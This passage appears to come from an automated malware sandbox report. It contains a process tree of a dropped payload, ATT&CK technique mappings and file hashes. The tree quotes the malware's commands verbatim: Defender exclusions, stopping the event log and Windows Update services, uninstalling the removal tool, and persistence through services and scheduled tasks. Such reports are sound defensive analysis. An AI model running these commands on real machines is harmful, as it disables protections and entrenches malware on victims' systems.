C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe7⤵PID:4768
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "BTTHHWER"7⤵
- Launches sc.exe
PID:5024
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "BTTHHWER" binpath= "C:\ProgramData\vyjyyzidkbdb\zrtdwpgwlkoj.exe" start= "auto"7⤵
- Launches sc.exe
PID:2964
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:3028
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "BTTHHWER"7⤵
- Launches sc.exe
PID:1660
-
-
-
C:\Windows\RuntimeBroker.exe"C:\Windows\RuntimeBroker.exe" /verysilent6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\RuntimeBroker.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\RuntimeBroker.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "RuntimeBroker" /tr "C:\ProgramData\RuntimeBroker.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:3124
-
-
-
C:\Windows\RuntimeBroker.exe"C:\Windows\RuntimeBroker.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3552
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3756
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3992
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4116
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4224
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2168
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1072
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2108
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe c3b1f6ecf4be5027c599eca17d604dbe 0sxHLKYJKkCzgDh1du/pzg.0.1.0.0.01⤵
- Sets service image path in registry
PID:3912 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4920
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:4912
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:4568
-
C:\ProgramData\vyjyyzidkbdb\zrtdwpgwlkoj.exeC:\ProgramData\vyjyyzidkbdb\zrtdwpgwlkoj.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4320 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:4448
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1376
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4368
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3200
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:3444
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3656
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4040
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4452
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4728
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3668
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:4380
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a8a147915e3a996fdbe10b3a3f1e1bb2
SHA1abc564c1be468d57e700913e7b6cf8f62d421263
SHA2568b96a8557deea66696837af011843d6a82451ba57c8f9b5a2726a70818d6fc7e
SHA51217b42f17ef60a9f625703172763f692e5ed2ca93564a97853dfa72bb0ac6305ef3267aea0b205938e3aa8eac10156d9d4f322b30d0329d92d647bcec6372731c
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD562623d22bd9e037191765d5083ce16a3
SHA14a07da6872672f715a4780513d95ed8ddeefd259
SHA25695d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA5129a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992
-
Filesize
944B
MD567e8893616f805af2411e2f4a1411b2a
SHA139bf1e1a0ddf46ce7c136972120f512d92827dcd
SHA256ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31
SHA512164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d
-
Filesize
944B
MD52709f3515c9fdf254003b81cb596f05c
SHA17f7be559531ba27641977f9acb42160e9b025912
SHA25663ca05e6ca84593c33346466e8bdd1568b85ff09d40d1d9d7158d00b1ac291a1
SHA5120ca8b1dd47b18078e453a3f307a7be8cae3476adaac1d94a28ddde4152131a4071cad7dac6e21d6cd556defa860cda06b92ab662898ae38344955b75c73f89cf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\is-29HGF.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
Filesize3.2MB
MD53d1cca2f13bb47bf0831cbc51aed9dcf
SHA18778a5e8406a10d97e4fb5f56aae3daca8ce147f
SHA256a3fe3785d7c05c9aae3fcfef09b01dc4a4746d3724436fd506b7b84b2a5b60ef
SHA512bb8ad21c3cbe427b43caec1a9c13c0dbba4d81654a81f94a8c8484a6b77bea135904b8e702cddba48ed64330df4383873b80aea8b318c8bc1b1ff124e0c9c13c
-
Filesize
366KB
MD54f5692a403b1b3dd667c76ce1f11d880
SHA1383940ce84f31672f1ce3e029a2a62f8c4fd71df
SHA256f1db2121b89f530bd74ed44c8a14e2ee3734db74fbb722f16c9f2466fb6e23c4
SHA512f0a1af04232e625800973b2b9f83d8273fffb7abda790007fef58b2e1a644a530a30df0bea2e66714ba7512f930a3e8b2af21b03119e783d563edcb22691b248
-
Filesize
7.1MB
MD5818c13bbcf389d9f4364e705d5cbb63e
SHA16b326d59f56f03023f4c6766bc92d3ff8749482b
SHA2565be3ee6cccd092da185a0507c254589c8d1192e1260a5a2c5502ab261b55ddc8
SHA512f5a23a34922314f32e78c6be3964ced80d6b81727e2d3325f92936bf773cc55050523993850c8bcb8c0ffafd4a47bc198c61e600d7f752cee451016f5199eaa0
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5